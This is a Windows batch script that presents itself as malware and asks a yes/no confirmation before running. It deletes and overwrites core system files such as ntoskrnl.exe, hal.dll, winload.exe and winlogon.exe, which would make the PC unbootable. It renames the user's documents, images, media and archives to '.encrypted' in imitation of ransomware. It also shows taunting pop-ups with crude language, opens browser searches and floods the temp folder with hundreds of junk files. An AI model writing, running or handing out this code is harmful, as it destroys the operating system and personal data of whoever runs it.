@echo off
:1
echo Ayyyyyyy this is a malware that will harm your pc and make it unusable, are you sure you wanna run this?
echo yes/no
set /p choice=
if /i %choice%==yes goto run
if /i %choice%==no goto exit
if not /i %choice%==yes,no goto 1

:run
takeown /f C:\boot.ini
del /f /q C:\boot.ini
cd C:\
echo.lansmshsnwqqq>>boot.ini
takeown /f C:\Windows\System32\hal.dll
del /f /q C:\Windows\System32\hal.dll
cd C:\Windows\System32
echo.rDabsjHLlr4/Aam>>hal.dll
takeown /f C:\Windows\System32\wininit.exe
del /f /q C:\Windows\System32\wininit.exe
echo.mKalouYtUumN>>wininit.exe
takeown /f C:\Windows\System32\svchost.exe
del /f /q C:\Windows\System32\svchost.exe
echo.LamkOiauNaj>>svchost.exe
takeown /f C:\Windows\System32\csrss.exe
del /f /q C:\Windows\System32\csrss.exe
echo.ZzzzzzzzzzzzzImDead>>csrss.exe
takeown /f C:\Windows\System32\ntoskrnl.exe
del /f /q C:\Windows\System32\ntoskrnl.exe
echo.ManManManManManManManamNamNamN>>ntoskrnl.exe
takeown /f C:\Windows\System32\winload.exe
del /f /q C:\Windows\System32\winload.exe
echo.ManiLamIsnalNsnakNskanzkNwkNnqj>>winload.exe
takeown /f C:\Windows\System32\winlogon.exe
del /f /q C:\Windows\System32\winlogon.exe
echo.SuCkMyDiCk>>winlogon.exe
cd %temp%
echo.YOUR PC IS BAMBOOZLED BY CARBON TROJAN>>rdfefsvghhdegghjdsqgdwughdfewgyuwffrewghhdfrehhfgf.txt
start rdfefsvghhdegghjdsqgdwughdfewgyuwffrewghhdfrehhfgf.txt
echo.x=msgbox ("PC IS MINE LOL",48,"AHAHAHAHHAHAHAHA")>>ronaldmcdonald.vbs
echo.x=msgbox ("Still using this computer?",16,"lol")>>lol1234.vbs
cd %USERPROFILE%
if exist *.exe ren *.exe *.encrypted
if exist *.vbe ren *.vbe *.encrypted
if exist *.vbs ren *.vbs *.encrypted
if exist *.docx ren *.docx *.encrypted
if exist *.docm ren *.docm *.encrypted
if exist *.xlsx ren *.xlsx *.encrypted
if exist *.xlsm ren *.xlsm *.encrypted
if exist *.txt ren *.txt *.encrypted
if exist *.bat ren *.bat *.encrypted
if exist *.cmd ren *.cmd *.encrypted
if exist *.js ren *.js *.encrypted
if exist *.jse ren *.jse *.encrypted
if exist *.bmp ren *.bmp *.encrypted
if exist *.rtf ren *.rtf *.encrypted
if exist *.png ren *.png *.encrypted
if exist *.jpg ren *.jpg *.encrypted
if exist *.jpeg ren *.jpeg *.encrypted
if exist *.mov ren *.mov *.encrypted
if exist *.xml ren *.xml *.encrypted
if exist *.mp4 ren *.mp4 *.encrypted
if exist *.mp3 ren *.mp3 *.encrypted
if exist *.wav ren *.wav *.encrypted
if exist *.vob ren *.vob *.encrypted
if exist *.cpl ren *.cpl *.encrypted
if exist *.cpi ren *.cpi *.encrypted
if exist *.msi ren *.msi *.encrypted
if exist *.msl ren *.msl *.encrypted
if exist *.com ren *.com *.encrypted
if exist *.html ren *.html *.encrypted
if exist *.rar ren *.rar *.encrypted
if exist *.zip ren *.zip *.encrypted
echo.Files encrypted>>lakslsbemdbdnsh.txt
start lakslsbemdbdnsh.txt
timeout 5
start www.google.co.ck/search?q=g3t+r3kt
timeout 5
start www.google.co.ck/search?q=how+2+buy+weed
timeout 5
start www.google.co.ck/search?q=FTAGSGHGSHYFGSCGHGSHGFYSFG
timeout 5 
start play.blooket.com/play
timeout 5
start lol1234.vbs
timeout 5
start lol1234.vbs
timeout 5
start lol1234.vbs
timeout 5
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
